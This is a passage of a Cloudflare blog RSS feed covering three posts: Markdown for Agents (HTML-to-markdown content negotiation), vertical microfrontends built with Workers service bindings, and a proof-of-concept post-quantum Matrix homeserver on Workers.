ideal: it wastes computation, adds costs and processing complexity, and above all, it may not be how the content creator intended their content to be used in the first place.</p><p>What if AI agents could bypass the complexities of intent analysis and document conversion, and instead receive structured markdown directly from the source?</p>
    <div>
      <h2>Convert HTML to markdown, automatically</h2>
      <a href="#convert-html-to-markdown-automatically">
        
      </a>
    </div>
    <p>Cloudflare's network now supports real-time content conversion at the source, for <a href="https://developers.cloudflare.com/fundamentals/reference/markdown-for-agents/"><u>enabled zones</u></a> using <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/Content_negotiation"><u>content negotiation</u></a> headers. Now when AI systems request pages from any website that uses Cloudflare and has Markdown for Agents enabled, they can express the preference for text/markdown in the request. Our network will automatically and efficiently convert the HTML to markdown, when possible, on the fly.</p><p>Here’s how it works. To fetch the markdown version of any page from a zone with Markdown for Agents enabled, the client needs to add the <b>Accept</b> negotiation header with <code>text/markdown</code><b> </b>as one of the options. Cloudflare will detect this, fetch the original HTML version from the origin, and convert it to markdown before serving it to the client.</p><p>Here's a curl example with the Accept negotiation header requesting a page from our developer documentation:</p>
            <pre><code>curl https://developers.cloudflare.com/fundamentals/reference/markdown-for-agents/ \
  -H "Accept: text/markdown"
</code></pre>
            <p>Or if you’re building an AI Agent using Workers, you can use TypeScript:</p>
            <pre><code>const r = await fetch(
  `https://developers.cloudflare.com/fundamentals/reference/markdown-for-agents/`,
  {
    headers: {
      Accept: "text/markdown, text/html",
    },
  },
);
const tokenCount = r.headers.get("x-markdown-tokens");
const markdown = await r.text();
</code></pre>
            <p>We already see some of the most popular coding agents today – like Claude Code and OpenCode – send these accept headers with their requests for content. Now, the response to this request is formatted  in markdown. It's that simple.  </p>
            <pre><code>HTTP/2 200
date: Wed, 11 Feb 2026 11:44:48 GMT
content-type: text/markdown; charset=utf-8
content-length: 2899
vary: accept
x-markdown-tokens: 725
content-signal: ai-train=yes, search=yes, ai-input=yes

---
title: Markdown for Agents · Cloudflare Agents docs
---

## What is Markdown for Agents

The ability to parse and convert HTML to Markdown has become foundational for AI.
...
</code></pre>
            <p>Note that we include an <code>x-markdown-tokens</code> header with the converted response that indicates the estimated number of tokens in the markdown document. You can use this value in your flow, for example to calculate the size of a context window or to decide on your chunking strategy.</p><p>Here’s a diagram of how it works:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Zw1Q5kBBqTrouN1362H5I/3080d74a2a971be1f1e7e0ba79611998/BLOG-3162_2.png" />
          </figure>
    <div>
      <h3>Content Signals Policy</h3>
      <a href="#content-signals-policy">
        
      </a>
    </div>
    <p>During our last Birthday Week, Cloudflare <a href="https://blog.cloudflare.com/content-signals-policy/"><u>announced</u></a> Content Signals — <a href="http://contentsignals.org"><u>a framework</u></a> that allows anyone to express their preferences for how their content can be used after it has been accessed. </p><p>When you return markdown, you want to make sure your content is being used by the Agent or AI crawler. That’s why Markdown for Agents converted responses include the <code>Content-Signal: ai-train=yes, search=yes, ai-input=yes</code> header signaling that indicates content can be used for AI Training, Search results and AI Input, which includes agentic use. Markdown for Agents will provide options to define custom Content Signal policies in the future.</p><p>Check our dedicated <a href="https://contentsignals.org/"><u>Content Signals</u></a> page for more information on this framework.</p>
    <div>
      <h3>Try it with the Cloudflare Blog &amp; Developer Documentation </h3>
      <a href="#try-it-with-the-cloudflare-blog-developer-documentation">
        
      </a>
    </div>
    <p>We enabled this feature in our <a href="https://developers.cloudflare.com/"><u>Developer Documentation</u></a> and our <a href="https://blog.cloudflare.com/"><u>Blog</u></a>, inviting all AI crawlers and agents to consume our content using markdown instead of HTML.</p><p>Try it out now by requesting this blog with <code>Accept: text/markdown</code>.</p>
            <pre><code>curl https://blog.cloudflare.com/markdown-for-agents/ \
  -H "Accept: text/markdown"</code></pre>
            <p>The result is:</p>
            <pre><code>---
description: The way content is discovered online is shifting, from traditional search engines to AI agents that need structured data from a Web built for humans. It’s time to consider not just human visitors, but start to treat agents as first-class citizens. Markdown for Agents automatically converts any HTML page requested from our network to markdown.
title: Introducing Markdown for Agents
image: https://blog.cloudflare.com/images/markdown-for-agents.png
---

# Introducing Markdown for Agents

The way content and businesses are discovered online is changing rapidly. In the past, traffic originated from traditional search engines and SEO determined who got found first. Now the traffic is increasingly coming from AI crawlers and agents that demand structured data within the often-unstructured Web that was built for humans.

...</code></pre>
            
    <div>
      <h3>Other ways to convert to Markdown</h3>
      <a href="#other-ways-to-convert-to-markdown">
        
      </a>
    </div>
    <p>If you’re building AI systems that require arbitrary document conversion from outside Cloudflare or Markdown for Agents is not available from the content source, we provide other ways to convert documents to Markdown for your applications:</p><ul><li><p>Workers AI <a href="https://developers.cloudflare.com/workers-ai/features/markdown-conversion/"><u>AI.toMarkdown()</u></a> supports multiple document types, not just HTML, and summarization.</p></li><li><p>Browser Rendering <a href="https://developers.cloudflare.com/browser-rendering/rest-api/markdown-endpoint/"><u>/markdown</u></a> REST API supports markdown conversion if you need to render a dynamic page or application in a real browser before converting it.</p></li></ul>
    <div>
      <h2>Tracking markdown usage</h2>
      <a href="#tracking-markdown-usage">
        
      </a>
    </div>
    <p>Anticipating a shift in how AI systems browse the Web, Cloudflare Radar now includes content type insights for AI bot and crawler traffic, both globally on the <a href="https://radar.cloudflare.com/ai-insights#content-type"><u>AI Insights</u></a> page and in the <a href="https://radar.cloudflare.com/bots/directory/gptbot"><u>individual bot</u></a> information pages.</p><p>The new <code>content_type</code> dimension and filter shows the distribution of content types returned to AI agents and crawlers, grouped by <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/MIME_types"><u>MIME type</u></a> category.  </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7vQzvzHsTLPXGhoQK0Xbr5/183129a8947990bc4ee5bb5ca7ba71b5/BLOG-3162_3.png" />
          </figure><p>You can also see the requests for markdown filtered by a specific agent or crawler. Here are the requests that return markdown to OAI-Searchbot, the crawler used by OpenAI to power ChatGPT’s search: </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7Ah99DWLxnYjadW6xJhAXg/afef4a29ae504d4fe69df4f9823dd103/BLOG-3162_4.png" />
          </figure><p>This new data will allow us to track the evolution of how AI bots, crawlers, and agents are consuming Web content over time. As always, everything on Radar is freely accessible via the <a href="https://developers.cloudflare.com/api/resources/radar/"><u>public APIs</u></a> and the <a href="https://radar.cloudflare.com/explorer?dataSet=ai.bots&amp;groupBy=content_type&amp;filters=userAgent%253DGPTBot&amp;timeCompare=1"><u>Data Explorer</u></a>. </p>
    <div>
      <h2>Start using today</h2>
      <a href="#start-using-today">
        
      </a>
    </div>
    <p>To enable Markdown for Agents for your zone, log into the Cloudflare <a href="https://dash.cloudflare.com/"><u>dashboard</u></a>, select your account, select the zone, look for Quick Actions and toggle the Markdown for Agents button to enable. This feature is available today in Beta at no cost for Pro, Business and Enterprise plans, as well as SSL for SaaS customers.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1UqzmHrNa1UdCCI6eXIfmn/3da0ff51dd94219d8af87c172d83fc72/BLOG-3162_5.png" />
          </figure><p>You can find more information about Markdown for Agents on our<a href="https://developers.cloudflare.com/fundamentals/reference/markdown-for-agents/"> Developer Docs</a>. We welcome your feedback as we continue to refine and enhance this feature. We’re curious to see how AI crawlers and agents navigate and adapt to the unstructured nature of the Web as it evolves.</p> ]]></content:encoded>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Agents]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <guid isPermaLink="false">5uEb99xvnHVk3QfN0KMjb6</guid>
            <dc:creator>Celso Martinho</dc:creator>
            <dc:creator>Will Allen</dc:creator>
        </item>
        <item>
            <title><![CDATA[Building vertical microfrontends on Cloudflare’s platform]]></title>
            <link>https://blog.cloudflare.com/vertical-microfrontends/</link>
            <pubDate>Fri, 30 Jan 2026 14:00:00 GMT</pubDate>
            <description><![CDATA[ Deploy multiple Workers under a single domain with the ability to make them feel like single-page applications. We take a look at how service bindings enable URL path routing to multiple projects. ]]></description>
            <content:encoded><![CDATA[ <p><i>Updated at 6:55 a.m. PT</i></p><p>Today, we’re introducing a new Worker template for Vertical Microfrontends (VMFE). <a href="https://dash.cloudflare.com/?to=/:account/workers-and-pages/create?type=vmfe"><u>This template</u></a> allows you to map multiple independent <a href="https://workers.cloudflare.com/"><u>Cloudflare Workers</u></a> to a single domain, enabling teams to work in complete silos — shipping marketing, docs, and dashboards independently — while presenting a single, seamless application to the user.</p><a href="https://dash.cloudflare.com/?to=/:account/workers-and-pages/create?type=vmfe"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p>Most microfrontend architectures are "horizontal", meaning different <i>parts</i> of a single page are fetched from different services. Vertical microfrontends take a different approach by splitting the application by URL path. In this model, a team owning the `/blog` path doesn't <i>just</i> own a component; they own the entire vertical stack for that route – framework, library choice, CI/CD and more. Owning the entire stack of a path, or set of paths, allows teams to have true ownership of their work and ship with confidence.</p><p>Teams face problems as they grow, where different frameworks serve varying use cases. A marketing website could be better utilized with Astro, for example, while a dashboard might be better with React. Or say you have a monolithic code base where many teams ship as a collective. An update to add new features from several teams can get frustratingly rolled back because a single team introduced a regression. How do we solve the problem of obscuring the technical implementation details away from the user and letting teams ship a cohesive user experience with full autonomy and control of their domains?</p><p>Vertical microfrontends can be the answer. Let’s dive in and explore how they solve developer pain points together.</p>
    <div>
      <h2>What are vertical microfrontends?</h2>
      <a href="#what-are-vertical-microfrontends">
        
      </a>
    </div>
    <p>A vertical microfrontend is an architectural pattern where a single independent team owns an entire slice of the application’s functionality, from the user interface all the way down to the <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">CI/CD pipeline</a>. These slices are defined by paths on a domain where you can associate individual Workers with specific paths:</p>
            <pre><code>/      = Marketing
/docs  = Documentation
/blog  = Blog
/dash  = Dashboard</code></pre>
            <p>We could take it a step further and focus on more granular sub-path Worker associations, too, such as a dashboard. Within a dashboard, you likely segment out various features or products by adding depth to your URL path (e.g. <code>/dash/product-a</code>) and navigating between two products could mean two entirely different code bases. </p><p>Now with vertical microfrontends, we could also have the following:</p>
            <pre><code>/dash/product-a  = WorkerA
/dash/product-b  = WorkerB</code></pre>
            <p>Each of the above paths are their own frontend project with zero shared code between them. The <code>product-a</code> and <code>product-b</code> routes map to separately deployed frontend applications that have their own frameworks, libraries, CI/CD pipelines defined and owned by their own teams. FINALLY.</p><p>You can now own your own code from end to end. But now we need to find a way to stitch these separate projects together, and even more so, make them feel as if they are a unified experience.</p><p>We experience this pain point ourselves here at Cloudflare, as the dashboard has many individual teams owning their own products. Teams must contend with the fact that changes made outside their control impact how users experience their product. </p><p>Internally, we are now using a similar strategy for our own dashboard. When users navigate from the core dashboard into our ZeroTrust product, in reality they are two entirely separate projects and the user is simply being routed to that project by its path <code>/:accountId/one</code>.</p>
    <div>
      <h2>Visually unified experiences</h2>
      <a href="#visually-unified-experiences">
        
      </a>
    </div>
    <p>Stitching these individual projects together to make them feel like a unified experience isn’t as difficult as you might think: It only takes a few lines of CSS magic. What we <i>absolutely do not want</i> to happen is to leak our implementation details and internal decisions to our users. If we fail to make this user experience feel like one cohesive frontend, then we’ve done a grave injustice to our users. </p><p>To accomplish this sleight of hand, let us take a little trip in understanding how view transitions and document preloading come into play.</p>
    <div>
      <h3>View transitions</h3>
      <a href="#view-transitions">
        
      </a>
    </div>
    <p>When we want to seamlessly navigate between two distinct pages while making it feel smooth to the end user, <a href="https://developer.mozilla.org/en-US/docs/Web/API/View_Transition_API"><u>view transitions</u></a> are quite useful. Defining specific <a href="https://www.w3schools.com/jsref/dom_obj_all.asp"><u>DOM elements</u></a> on our page to stick around until the next page is visible, and defining how any changes are handled, make for quite the powerful quilt-stitching tool for multi-page applications.</p><p>There may be, however, instances where making the various vertical microfrontends feel different is more than acceptable. Perhaps our marketing website, documentation, and dashboard are each uniquely defined, for instance. A user would not expect all three of those to feel cohesive as you navigate between the three parts. But… if you decide to introduce vertical slices to an individual experience such as the dashboard (e.g. <code>/dash/product-a</code> &amp; <code>/dash/product-b</code>), then users should <b>never</b> know they are two different repositories/workers/projects underneath.</p><p>Okay, enough talk — let’s get to work. I mentioned it was low-effort to make two separate projects feel as if they were one to a user, and if you have yet to hear about <a href="https://developer.mozilla.org/en-US/docs/Web/API/View_Transition_API"><u>CSS View Transitions</u></a> then I’m about to blow your mind.</p><p>What if I told you that you could make animated transitions between different views  — single-page app (SPA) or multi-page app (MPA) — feel as if they were one? Before any view transitions are added, if we navigate between pages owned by two different Workers, the interstitial loading state would be the white blank screen in our browser for some few hundred milliseconds until the full next page began rendering. Pages would not feel cohesive, and it certainly would not feel like a single-page application.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4vw1Am7gYUQPtmFFCRcsu1/774b881dff7ce1c26db88f30623dfc13/image3.png" />
          </figure><p><sup>Appears as multiple navigation elements between each site.</sup></p><p>If we want elements to stick around, rather than seeing a white blank page, we can achieve that by defining CSS View Transitions. With the code below, we’re telling our current document page that when a view transition event is about to happen, keep the <code>nav</code> DOM element on the screen, and if any delta in appearance exists between our existing page and our destination page, then we’ll animate that with an <code>ease-in-out</code> transition.</p><p>All of a sudden, two different Workers feel like one.</p>
            <pre><code>@supports (view-transition-name: none) {
  ::view-transition-old(root),
  ::view-transition-new(root) {
    animation-duration: 0.3s;
    animation-timing-function: ease-in-out;
  }
  nav { view-transition-name: navigation; }
}</code></pre>
            
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4h6Eh5LSX4552QJDvV1l7o/a5a43ee0e6e011bca58ecc2d74902744/image1.png" />
          </figure><p><sup>Appears as a single navigation element between three distinct sites.</sup></p>
    <div>
      <h3>Preloading</h3>
      <a href="#preloading">
        
      </a>
    </div>
    <p>Transitioning between two pages makes it <i>look</i> seamless — and we also want it to <i>feel</i> as instant as a client-side SPA. While currently Firefox and Safari do not support <a href="https://developer.mozilla.org/en-US/docs/Web/API/Speculation_Rules_API"><u>Speculation Rules</u></a>, Chrome/Edge/Opera do support the more recent newcomer. The speculation rules API is designed to improve performance for future navigations, particularly for document URLs, making multi-page applications feel more like single-page applications.</p><p>Breaking it down into code, what we need to define is a script rule in a specific format that tells the supporting browsers how to prefetch the other vertical slices that are connected to our web application — likely linked through some shared navigation.</p>
            <pre><code>&lt;script type="speculationrules"&gt;
  {
    "prefetch": [
      {
        "urls": ["https://product-a.com", "https://product-b.com"],
        "requires": ["anonymous-client-ip-when-cross-origin"],
        "referrer_policy": "no-referrer"
      }
    ]
  }
&lt;/script&gt;</code></pre>
            <p>With that, our application prefetches our other microfrontends and holds them in our in-memory cache, so if we were to navigate to those pages it would feel nearly instant.</p><p>You likely won’t require this for clearly discernible vertical slices (marketing, docs, dashboard) because users would expect a slight load between them. However, it is highly encouraged to use when vertical slices are defined within a specific visible experience (e.g. within dashboard pages).</p><p>Between <a href="https://developer.mozilla.org/en-US/docs/Web/API/View_Transition_API"><u>View Transitions</u></a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Speculation_Rules_API"><u>Speculation Rules</u></a>, we are able to tie together entirely different code repositories to feel as if they were served from a single-page application. Wild if you ask me.</p>
    <div>
      <h2>Zero-config request routing</h2>
      <a href="#zero-config-request-routing">
        
      </a>
    </div>
    <p>Now we need a mechanism to host multiple applications, and a method to stitch them together as requests stream in. Defining a single Cloudflare Worker as the “Router” allows a single logical point (at the edge) to handle network requests and then forward them to whichever vertical microfrontend is responsible for that URL path. Plus it doesn’t hurt that then we can map a single domain to that router Worker and the rest “just works.”</p>
    <div>
      <h3>Service bindings</h3>
      <a href="#service-bindings">
        
      </a>
    </div>
    <p>If you have yet to explore Cloudflare Worker <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/service-bindings/"><u>service bindings</u></a>, then it is worth taking a moment to do so. </p><p>Service bindings allow one Worker to call into another, without going through a publicly-accessible URL. A Service binding allows Worker A to call a method on Worker B, or to forward a request from Worker A to Worker. Breaking it down further, the Router Worker can call into each vertical microfrontend Worker that has been defined (e.g. marketing, docs, dashboard), assuming each of them were Cloudflare Workers.</p><p>Why is this important? This is precisely the mechanism that “stitches” these vertical slices together. We’ll dig into how the request routing is handling the traffic split in the next section. But to define each of these microfrontends, we’ll need to update our Router Worker’s wrangler definition, so it knows which frontends it’s allowed to call into.
</p>
            <pre><code>{
  "$schema": "./node_modules/wrangler/config-schema.json",
  "name": "router",
  "main": "./src/router.js",
  "services": [
    {
      "binding": "HOME",
      "service": "worker_marketing"
    },
    {
      "binding": "DOCS",
      "service": "worker_docs"
    },
    {
      "binding": "DASH",
      "service": "worker_dash"
    },
  ]
}</code></pre>
            <p>Our above sample definition is defined in our Router Worker, which then tells us that we are permitted to make requests into three separate additional Workers (marketing, docs, and dash). Granting permissions is as simple as that, but let’s tumble into some of the more complex logic with request routing and HTML rewriting network responses.</p>
    <div>
      <h3>Request routing</h3>
      <a href="#request-routing">
        
      </a>
    </div>
    <p>With knowledge of the various other Workers we are able to call into if needed, now we need some logic in place to know where to direct network requests when. Since the Router Worker is assigned to our custom domain, all incoming requests hit it first at the network edge. It then determines which Worker should handle the request and manages the resulting response. </p><p>The first step is to map URL paths to associated Workers. When a certain request URL is received, we need to know where it needs to be forwarded. We do this by defining rules. While we support wildcard routes, dynamic paths, and parameter constraints, we are going to stay focused on the basics — literal path prefixes — as it illustrates the point more clearly. </p><p> In this example, we have three microfrontends:</p>
            <pre><code>/      = Marketing
/docs  = Documentation
/dash  = Dashboard</code></pre>
            <p>Each of the above paths need to be mapped to an actual Worker (see our wrangler definition for services in the section above). For our Router Worker, we define an additional variable with the following data, so we can know which paths should map to which service bindings. We now know where to route users as requests come in! Define a wrangler variable with the name ROUTES and the following contents:</p>
            <pre><code>{
  "routes":[
    {"binding": "HOME", "path": "/"},
    {"binding": "DOCS", "path": "/docs"},
    {"binding": "DASH", "path": "/dash"}
  ]
}</code></pre>
            <p>Let’s envision a user visiting our website path <code>/docs/installation</code>. Under the hood, what happens is the request first reaches our Router Worker which is in charge of understanding what URL paths map to which individual Workers. It understands that the <code>/docs</code> path prefix is mapped to our <code>DOCS</code> service binding which referencing our wrangler file points us at our <code>worker_docs</code> project. Our Router Worker, knowing that <code>/docs</code> is defined as a vertical microfrontend route, removes the <code>/docs</code> prefix from the path and forwards the request to our <code>worker_docs</code> Worker to handle the request and then finally returns whatever response we get.</p><p>Why does it drop the <code>/docs</code> path, though? This was an implementation detail choice that was made so that when the Worker is accessed via the Router Worker, it can clean up the URL to handle the request <i>as if </i>it were called from outside our Router Worker. Like any Cloudflare Worker, our <code>worker_docs</code> service might have its own individual URL where it can be accessed. We decided we wanted that service URL to continue to work independently. When it’s attached to our new Router Worker, it would automatically handle removing the prefix, so the service could be accessible from its own defined URL or through our Router Worker… either place, doesn’t matter.</p>
    <div>
      <h3>HTMLRewriter</h3>
      <a href="#htmlrewriter">
        
      </a>
    </div>
    <p>Splitting our various frontend services with URL paths (e.g. <code>/docs</code> or <code>/dash</code>) makes it easy for us to forward a request, but when our response contains HTML that doesn’t know it’s being reverse proxied through a path component… well, that causes problems. </p><p>Say our documentation website has an image tag in the response <code>&lt;img src="./logo.png" /&gt;</code>. If our user was visiting this page at <code>https://website.com/docs/</code>, then loading the <code>logo.png</code> file would likely fail because our <code>/docs</code> path is somewhat artificially defined only by our Router Worker.</p><p>Only when our services are accessed through our Router Worker do we need to do some HTML rewriting of absolute paths so our returned browser response references valid assets. In practice what happens is that when a request passes through our Router Worker, we pass the request to the correct Service Binding, and we receive the response from that. Before we pass that back to the client, we have an opportunity to rewrite the DOM — so where we see absolute paths, we go ahead and prepend that with the proxied path. Where previously our HTML was returning our image tag with <code>&lt;img src="./logo.png" /&gt;</code> we now modify it before returning to the client browser to <code>&lt;img src="./docs/logo.png" /&gt;</code>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/10jKx6qt2YcarpDyEsFNYV/3b0f11f56e3c9b2deef59934cf8efa7f/image2.png" />
          </figure><p>Let’s return for a moment to the magic of CSS view transitions and document preloading. We could of course manually place that code into our projects and have it work, but this Router Worker will <i>automatically</i> handle that logic for us by also using <a href="https://developers.cloudflare.com/workers/runtime-apis/html-rewriter/"><u>HTMLRewriter</u></a>. </p><p>In your Router Worker <code>ROUTES</code> variable, if you set <code>smoothTransitions</code> to <code>true</code> at the root level, then the CSS transition views code will be added automatically. Additionally, if you set the <code>preload</code> key within a route to <code>true</code>, then the script code speculation rules for that route will automatically be added as well. </p><p>Below is an example of both in action:</p>
            <pre><code>{
  "smoothTransitions":true, 
  "routes":[
    {"binding": "APP1", "path": "/app1", "preload": true},
    {"binding": "APP2", "path": "/app2", "preload": true}
  ]
}</code></pre>
            
    <div>
      <h2>Get started</h2>
      <a href="#get-started">
        
      </a>
    </div>
    <p>You can start building with the Vertical Microfrontend template today.</p><p>Visit the Cloudflare Dashboard <a href="https://dash.cloudflare.com/?to=/:account/workers-and-pages/create?type=vmfe"><u>deeplink here</u></a> or go to “Workers &amp; Pages” and click the “Create application” button to get started. From there, click “Select a template” and then “Create microfrontend” and you can begin configuring your setup.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1teTcTNHzQH3yCvbTz3xyU/8f9a4b2ef3ec1c6ed13cbdc51d6b13c5/image5.png" />
          </figure><p>
Check out the <a href="https://developers.cloudflare.com/workers/framework-guides/web-apps/microfrontends"><u>documentation</u></a> to see how to map your existing Workers and enable View Transitions. We can't wait to see what complex, multi-team applications you build on the edge!</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Dashboard]]></category>
            <category><![CDATA[Front End]]></category>
            <category><![CDATA[Micro-frontends]]></category>
            <guid isPermaLink="false">2u7SNZ4BZcQYHZYKqmdEaM</guid>
            <dc:creator>Brayden Wilmoth</dc:creator>
        </item>
        <item>
            <title><![CDATA[Building a serverless, post-quantum Matrix homeserver]]></title>
            <link>https://blog.cloudflare.com/serverless-matrix-homeserver-workers/</link>
            <pubDate>Tue, 27 Jan 2026 14:00:00 GMT</pubDate>
            <description><![CDATA[ As a proof of concept, we built a Matrix homeserver to Cloudflare Workers — delivering encrypted messaging at the edge with automatic post-quantum cryptography. ]]></description>
            <content:encoded><![CDATA[ <p><sup><i>* This post was updated at 11:45 a.m. Pacific time to clarify that the use case described here is a proof of concept and a personal project. Some sections have been updated for clarity.</i></sup></p><p>Matrix is the gold standard for decentralized, end-to-end encrypted communication. It powers government messaging systems, open-source communities, and privacy-focused organizations worldwide. </p><p>For the individual developer, however, the appeal is often closer to home: bridging fragmented chat networks (like Discord and Slack) into a single inbox, or simply ensuring your conversation history lives on infrastructure you control. Functionally, Matrix operates as a decentralized, eventually consistent state machine. Instead of a central server pushing updates, homeservers exchange signed JSON events over HTTP, using a conflict resolution algorithm to merge these streams into a unified view of the room's history.</p><p><b>But there is a "tax" to running it. </b>Traditionally, operating a Matrix <a href="https://matrix.org/homeserver/about/"><u>homeserver</u></a> has meant accepting a heavy operational burden. You have to provision virtual private servers (VPS), tune PostgreSQL for heavy write loads, manage Redis for caching, configure <a href="https://www.cloudflare.com/learning/cdn/glossary/reverse-proxy/"><u>reverse proxies</u></a>, and handle rotation for <a href="https://www.cloudflare.com/application-services/products/ssl/">TLS certificates</a>. It’s a stateful, heavy beast that demands to be fed time and money, whether you’re using it a lot or a little.</p><p>We wanted to see if we could eliminate that tax entirely.</p><p><b>Spoiler: We could.</b> In this post, we’ll explain how we ported a Matrix homeserver to <a href="https://workers.cloudflare.com/"><u>Cloudflare Workers</u></a>. The resulting proof of concept is a serverless architecture where operations disappear, costs scale to zero when idle, and every connection is protected by <a href="https://www.cloudflare.com/learning/ssl/quantum/what-is-post-quantum-cryptography/"><u>post-quantum cryptography</u></a> by default. You can view the source code and <a href="https://github.com/nkuntz1934/matrix-workers"><u>deploy your own instance directly from Github</u></a>.</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/nkuntz1934/matrix-workers"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p></p>
    <div>
      <h2>From Synapse to Workers</h2>
      <a href="#from-synapse-to-workers">
        
      </a>
    </div>
    <p>Our starting point was <a href="https://github.com/matrix-org/synapse"><u>Synapse</u></a>, the Python-based reference Matrix homeserver designed for traditional deployments. PostgreSQL for persistence, Redis for caching, filesystem for media.</p><p>Porting it to Workers meant questioning every storage assumption we’d taken for granted.</p><p>The challenge was storage. Traditional homeservers assume strong consistency via a central SQL database. Cloudflare <a href="https://developers.cloudflare.com/durable-objects/"><u>Durable Objects</u></a> offers a powerful alternative. This primitive gives us the strong consistency and atomicity required for Matrix state resolution, while still allowing the application to run at the edge.</p><p>We ported the core Matrix protocol logic — event authorization, room state resolution, cryptographic verification — in TypeScript using the Hono framework. D1 replaces PostgreSQL, KV replaces Redis, R2 replaces the filesystem, and Durable Objects handle real-time coordination.</p><p>Here’s how the mapping worked out:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1JTja38UZRbFygluawrnz1/9bce290e3070155c734e874c17051551/BLOG-3101_2.png" />
          </figure>
    <div>
      <h2>From monolith to serverless</h2>
      <a href="#from-monolith-to-serverless">
        
      </a>
    </div>
    <p>Moving to Cloudflare Workers brings several advantages for a developer: simple deployment, lower costs, low latency, and built-in security.</p><p><b>Easy deployment: </b>A traditional Matrix deployment requires server provisioning, PostgreSQL administration, Redis cluster management, <a href="https://www.cloudflare.com/application-services/solutions/certificate-lifecycle-management/">TLS certificate renewal</a>, load balancer configuration, monitoring infrastructure, and on-call rotations.</p><p>With Workers, deployment is simply: wrangler deploy. Workers handles TLS, load balancing, DDoS protection, and global distribution. </p><p><b>Usage-based costs: </b>Traditional homeservers cost money whether anyone is using them or not. Workers pricing is request-based, so you pay when you’re using it, but costs drop to near zero when everyone’s asleep. </p><p><b>Lower latency globally:</b> A traditional Matrix homeserver in us-east-1 adds 200ms+ latency for users in Asia or Europe. Workers, meanwhile, run in 300+ locations worldwide. When a user in Tokyo sends a message, the Worker executes in Tokyo. </p><p><b>Built-in security: </b>Matrix homeservers can be high-value targets: They handle encrypted communications, store message history, and authenticate users. Traditional deployments require careful hardening: firewall configuration, rate limiting, DDoS mitigation, WAF rules, IP reputation filtering.</p><p>Workers provide all of this by default. </p>
    <div>
      <h3>Post-quantum protection </h3>
      <a href="#post-quantum-protection">
        
      </a>
    </div>
    <p>Cloudflare deployed post-quantum hybrid key agreement across all <a href="https://www.cloudflare.com/learning/ssl/why-use-tls-1.3/"><u>TLS 1.3</u></a> connections in <a href="https://blog.cloudflare.com/post-quantum-for-all/"><u>October 2022</u></a>. Every connection to our Worker automatically negotiates X25519MLKEM768 — a hybrid combining classical X25519 with ML-KEM, the post-quantum algorithm standardized by NIST.</p><p>Classical cryptography relies on mathematical problems that are hard for traditional computers but trivial for quantum computers running Shor’s algorithm. ML-KEM is based on lattice problems that remain hard even for quantum computers. The hybrid approach means both algorithms must fail for the connection to be compromised.</p>
    <div>
      <h3>Following a message through the system</h3>
      <a href="#following-a-message-through-the-system">
        
      </a>
    </div>
    <p>Understanding where encryption happens matters for security architecture. When someone sends a message through our homeserver, here’s the actual path:</p><p>The sender’s client takes the plaintext message and encrypts it with Megolm — Matrix’s end-to-end encryption. This encrypted payload then gets wrapped in TLS for transport. On Cloudflare, that TLS connection uses X25519MLKEM768, making it quantum-resistant.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/wGGYZ4LYspufH1c4psmL1/28acad8ab8e6535525dda413669c2d74/BLOG-3101_3.png" />
          </figure><p>The Worker terminates TLS, but what it receives is still encrypted — the Megolm ciphertext. We store that ciphertext in D1, index it by room and timestamp, and deliver it to recipients. But we never see the plaintext. The message “Hello, world” exists only on the sender’s device and the recipient’s device.</p><p>When the recipient syncs, the process reverses. They receive the encrypted payload over another quantum-resistant TLS connection, then decrypt locally with their Megolm session keys.</p>
    <div>
      <h3>Two layers, independent protection</h3>
      <a href="#two-layers-independent-protection">
        
      </a>
    </div>
    <p>This protects via two encryption layers that operate independently:</p><p>The <a href="https://www.cloudflare.com/learning/ssl/transport-layer-security-tls/"><u>transport layer (TLS)</u></a> protects data in transit. It’s encrypted at the client and decrypted at the Cloudflare edge. With X25519MLKEM768, this layer is now post-quantum.</p><p>The <a href="https://www.cloudflare.com/learning/ddos/what-is-layer-7/"><u>application layer</u></a> (Megolm E2EE) protects message content. It’s encrypted on the sender’s device and decrypted only on recipient devices. This uses classical Curve25519 cryptography.</p>
    <div>
      <h3>Who sees what</h3>
      <a href="#who-sees-what">
        
      </a>
    </div>
    <p>Any Matrix homeserver operator — whether running Synapse on a VPS or this implementation on Workers — can see metadata: which rooms exist, who’s in them, when messages were sent. But no one in the infrastructure chain can see the message content, because the E2EE payload is encrypted on sender devices before it ever hits the network. Cloudflare terminates TLS and passes requests to your Worker, but both see only Megolm ciphertext. Media in encrypted rooms is encrypted client-side before upload, and private keys never leave user devices.</p>
    <div>
      <h3>What traditional deployments would need</h3>
      <a href="#what-traditional-deployments-would-need">
        
      </a>
    </div>
